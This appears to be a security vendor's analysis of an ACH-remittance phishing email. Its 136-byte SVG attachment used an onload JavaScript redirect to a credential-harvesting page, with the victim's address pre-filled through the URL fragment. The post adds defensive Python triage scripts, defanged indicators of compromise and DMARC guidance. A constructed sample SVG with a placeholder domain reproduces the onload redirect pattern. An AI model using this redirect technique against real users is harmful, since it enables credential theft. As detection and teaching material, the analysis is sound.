The entire phishing payload fit inside 136 bytes.
No macro. No exploit kit. No multi-stage dropper. Just a single SVG file smaller than this paragraph, carrying a JavaScript onload event that hijacked the browser the instant a recipient opened it. The attachment passed antivirus scanning with a clean verdict, and the email cleared Microsoft's spam filters with an SCL score of 1. The target: an employee at a mid-size insurance claims adjustment firm, lured by a fake ACH remittance notification referencing a fabricated payment from a fictitious vendor.
A Remittance Email With Nothing Inside
The subject line was built for urgency: an approved ACH payment, a vendor name, a reference number, and the phrase "EFT Details." Everything a finance team employee would expect from a legitimate remittance notification. But the email body told a different story.
There were no payment amounts. No routing numbers. No invoice references. The visible content was limited to a legal disclaimer block and an email security scanning notice. That disconnect between what the subject promised and what the body delivered is a reliable indicator of a payload-dependent attack. The attacker needed the recipient to open the attachment to trigger the kill chain.
The Verizon DBIR 2024 found that pretexting, including financial transaction lures, was involved in 40% of social engineering incidents. ACH and wire transfer themes remain among the most effective pretexts because they create time pressure and financial anxiety simultaneously.
The Smallest Weapon in the Inbox
The attached file was an SVG with no filename beyond the .svg extension. At 136 bytes, it contained exactly one functional element: an onload attribute executing a window.location redirect. The moment a mail client or browser rendered the SVG, the recipient's session was silently redirected to an external credential harvesting page.
This technique exploits a fundamental blind spot. Most email security gateways treat SVG files as static image assets. Signature-based scanners look for known malicious patterns, embedded executables, or suspicious macro code. A 136-byte file with a single JavaScript line contains none of those signatures. The antivirus engine returned a clean verdict. The behavioral reality was anything but.
The redirect target was hosted on cic-news[.]ca, a domain with no SPF record, no DMARC policy, and no DNSSEC. The WHOIS record showed lightweight, individual-style registration consistent with disposable phishing infrastructure. The domain resolved to 104[.]198[.]174[.]130 and returned HTTP 200 at the time of analysis, confirming it was live and ready to receive redirected traffic.
Fragment Identifier as Pre-Fill Token
The redirect URL included a fragment identifier containing the target's email address:
`hxxps://cic-news[.]ca/dontcare/#`
This is a deliberate design choice. URL fragments are processed exclusively on the client side. They never appear in server logs or network-level inspection tools, making them invisible to proxy-based URL scanners. JavaScript on the landing page reads the fragment, extracts the email address, and pre-fills the credential harvesting form. The victim sees their own email address already populated, which increases the perceived legitimacy of the page and the likelihood they will enter their password.
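The two behaviours described above (an event handler that fires on render, and an address smuggled in the URL fragment) are both visible in the file itself, so an attachment scanner can look for them without executing anything. The script below is an added example, not IRONSCALES code or the actual attachment: it parses an SVG, lists every event-handler attribute and `<script>` element, pulls absolute URLs out of handler code, and reports any email address carried in a fragment. The sample SVG is constructed to mirror the pattern in the article; the landing domain and address are placeholders.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample that mirrors the pattern described in the article (it is
# not the real attachment): a bare <svg> whose onload handler rewrites
# window.location and carries an address in the URL fragment. Placeholders only.
SAMPLE_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b"onload=\"window.location='https://landing.example/p/#user@example.com'\"/>"
)

# Any on* attribute is an event handler that runs script when a browser renders the SVG.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# Quoted absolute URLs inside handler code.
URL_IN_JS = re.compile(r"""['"]((?:https?:)?//[^'"]+)['"]""")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def triage_svg(data: bytes) -> dict:
    """Classify an SVG attachment by what it would do when rendered.

    Returns the byte size, the event-handler attributes and <script> elements
    found, URLs referenced from handler code, and any email address carried
    in a URL fragment (the client-side pre-fill trick).
    """
    findings = {"size": len(data), "event_attrs": [], "script_elems": 0,
                "redirect_urls": [], "fragment_emails": [], "parse_error": None}
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed XML still deserves a look: treat it as active until proven otherwise.
        findings["parse_error"] = str(exc)
        findings["active"] = True
        return findings
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]          # strip the namespace prefix
        if tag == "script":
            findings["script_elems"] += 1
        for name, value in elem.attrib.items():
            local = name.split("}")[-1]
            if EVENT_ATTR.match(local):
                findings["event_attrs"].append(local.lower())
                for url in URL_IN_JS.findall(value):
                    findings["redirect_urls"].append(url)
                    # The fragment never leaves the browser, so a proxy log will not show it.
                    findings["fragment_emails"].extend(EMAIL.findall(urlsplit(url).fragment))
            elif local == "href" and value.strip().lower().startswith("javascript:"):
                findings["event_attrs"].append("href:javascript")
    findings["active"] = bool(findings["event_attrs"] or findings["script_elems"])
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(triage_svg(SAMPLE_SVG), indent=2))
```

Run it over the constructed sample and `active` comes back true with `onload` as the trigger and the address recovered from the fragment; a plain `<circle>` SVG comes back inactive. A gateway rule that quarantines any SVG with `active` set is the behavioural equivalent of the blanket block the article recommends later, for organisations that cannot drop SVG entirely.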
The FBI IC3 2024 report documented over $2.9 billion in BEC losses, with payment diversion and credential theft remaining the top objectives. Techniques like fragment-based personalization represent the ongoing sophistication of phishing infrastructure, moving well beyond mass-blast campaigns toward individually tailored credential harvesting.
A Relay Path That Should Have Been a Red Flag
The email originated from IP 178[.]211[.]155[.]35, which reverse-resolves to a DeltaHost pointer record and geolocates to Frankfurt, Germany. DeltaHost is a web hosting provider, not an email security gateway. The Message-ID referenced @localhost, and the Return-Path was empty, both strong indicators of script-based injection from a compromised or rented server.
Authentication results confirmed the problem:
- SPF: Fail (the sending IP is not authorized for the claimed domain)
- DKIM: None (no signature present)
- DMARC: None (no policy published)
Despite this triple authentication failure, the message was delivered to the inbox. The Microsoft Digital Defense Report 2024 emphasized that authentication alone is insufficient without enforcement. When a domain's DMARC policy is p=none or absent entirely, a failed SPF check and a missing DKIM signature become informational signals rather than blocking criteria. Attackers know this. They specifically target organizations and domains where DMARC enforcement is not configured, because it guarantees delivery despite authentication failures.
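The header indicators in this section (SPF fail, no DKIM, no DMARC, an empty Return-Path and an `@localhost` Message-ID) can be scored mechanically, and the difference between an enforcing and a non-enforcing inbound posture is a single switch. The script below is an added example, not code from IRONSCALES or from the analysed message: it parses the `Authentication-Results` header, collects the structural red flags, and returns a disposition. The raw headers are constructed to model the article's indicators; hosts, addresses and the sending IP are placeholders.

```python
import re
from email import message_from_string

# Constructed raw headers modelled on the indicators in the article (not the
# real message): empty Return-Path, @localhost Message-ID, SPF fail, no DKIM
# signature, no DMARC policy. Hosts, addresses and IPs are placeholders.
SAMPLE_HEADERS = """\
Return-Path: <>
Message-ID: <20240101120000.1234@localhost>
From: "Accounts Payable" <ap@vendor.example>
To: finance@victim.example
Subject: ACH Payment Approved - EFT Details
Authentication-Results: mx.victim.example; spf=fail (sender IP is 203.0.113.5) smtp.mailfrom=vendor.example; dkim=none; dmarc=none action=none header.from=vendor.example

"""

# Constructed control case: a fully authenticated message from the same sender.
CLEAN_HEADERS = """\
Return-Path: <ap@vendor.example>
Message-ID: <20240101120000.1234@mail.vendor.example>
From: "Accounts Payable" <ap@vendor.example>
To: finance@victim.example
Subject: Invoice 1001
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=vendor.example; dkim=pass header.d=vendor.example; dmarc=pass header.from=vendor.example

"""


def parse_auth_results(value: str) -> dict:
    """Pull the spf/dkim/dmarc result tokens out of an Authentication-Results value."""
    results = {}
    for method in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{method}=(\w+)", value)
        results[method] = m.group(1).lower() if m else "none"
    return results


def triage_headers(raw: str, enforce: bool = True) -> dict:
    """Score a message's headers and decide its disposition.

    enforce=True models an inbound posture that acts on authentication
    failures; enforce=False models the p=none situation the article describes,
    where the same failures are only recorded and the mail is delivered.
    """
    msg = message_from_string(raw)
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    signals = []
    if auth["spf"] == "fail":
        signals.append("spf_fail")
    if auth["dkim"] == "none":
        signals.append("dkim_missing")
    if auth["dmarc"] == "none":
        signals.append("dmarc_missing")
    if msg.get("Return-Path", "").strip() in ("", "<>"):
        signals.append("empty_return_path")      # typical of script-injected mail
    if msg.get("Message-ID", "").strip().rstrip(">").endswith("@localhost"):
        signals.append("localhost_message_id")

    auth_failed = "spf_fail" in signals and "dkim_missing" in signals
    if enforce and auth_failed:
        verdict = "quarantine"
    elif signals:
        verdict = "flag"          # delivered; failures are informational only
    else:
        verdict = "deliver"
    return {"auth": auth, "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    for posture in (True, False):
        print("enforce =", posture, "->", triage_headers(SAMPLE_HEADERS, enforce=posture)["verdict"])
```

With `enforce=True` the constructed message is quarantined on the SPF failure plus missing DKIM alone; with `enforce=False` the same five signals are recorded and the message reaches the inbox, which is exactly the gap the article describes. The control headers produce no signals and a plain `deliver`.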
IRONSCALES flagged the message through behavioral analysis. While static scanners cleared the attachment and the email contained no embedded URLs to evaluate, the platform's analysis of the SVG payload identified the onload redirect behavior. Community-based reputation signals also contributed, matching patterns from previously reported phishing campaigns with similar structural characteristics. The combination of behavioral detection and community intelligence compensated for what authentication and signature-based scanning missed.
The Attack Chain, Step by Step
| Step | Action | MITRE Technique |
|---|---|---|
| 1 | Attacker crafts ACH remittance subject with fabricated vendor name and reference number | T1036.005 |
| 2 | Email sent from DeltaHost IP via script injection, empty Return-Path, localhost Message-ID | T1566.001 |
| 3 | 136-byte SVG attachment passes AV scanning as clean | T1027 |
| 4 | Recipient opens SVG; onload event fires JavaScript redirect | T1204.002 |
| 5 | Browser navigates to credential harvesting page with email pre-filled via URL fragment | T1566.001 |
SVG Redirect IOCs
| Type | Indicator | Context |
|---|---|---|
| IP | 178[.]211[.]155[.]35 | Sending IP, DeltaHost, Frankfurt DE |
| Domain | cic-news[.]ca | Credential harvesting landing domain |
| IP | 104[.]198[.]174[.]130 | Landing page hosting IP |
| URL | hxxps://cic-news[.]ca/dontcare/# | Redirect target with fragment pre-fill |
| File | .svg (MD5: 9cf631dbe76de7121fb96306c2473008) | 136-byte SVG with onload JS redirect |
What Your Team Should Do This Week
- Block SVG attachments at the gateway. If your organization has no legitimate business need for inbound SVG files, block them. Most email security platforms allow attachment-type filtering. This single rule would have prevented this entire attack chain.
- Enforce DMARC with reject or quarantine. A triple authentication failure (SPF fail, no DKIM, no DMARC) should never result in inbox delivery. Audit your domain's DMARC policy and your inbound DMARC enforcement posture. CISA's phishing guidance recommends reject-level DMARC as a baseline control.
- Layer behavioral analysis on attachment scanning. Static AV missed this because the payload was a syntactically legitimate JavaScript call, not a known malicious signature. Behavioral analysis that evaluates what an attachment does when rendered (rather than what it contains statically) is the detection layer that catches advanced attachment-based threats like this one.
- Train finance teams on content mismatch. When a subject line promises payment details and the body contains only a disclaimer, something is wrong. That instinct needs to be muscle memory for anyone handling financial communications.
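For the DMARC recommendation above, the difference between a monitoring-only record and an enforced one is a single tag. The records below are an added illustration, not taken from any domain in the article; `example.com` and the report mailboxes are placeholders, and the `rua`/`ruf` addresses must be mailboxes the domain owner actually controls.

```dns
; Monitoring only: receivers report DMARC failures but still deliver the mail.
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"

; Enforced: receivers reject mail that fails DMARC alignment, including for subdomains.
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc-reports@example.com; ruf=mailto:dmarc-forensic@example.com; fo=1"
```

Publishing the record protects recipients of mail claiming to be from your domain; the inbound half of the recommendation, honouring other domains' reject and quarantine policies and treating an SPF fail with no DKIM as a blocking condition, is a setting on your own mail gateway and has to be audited separately.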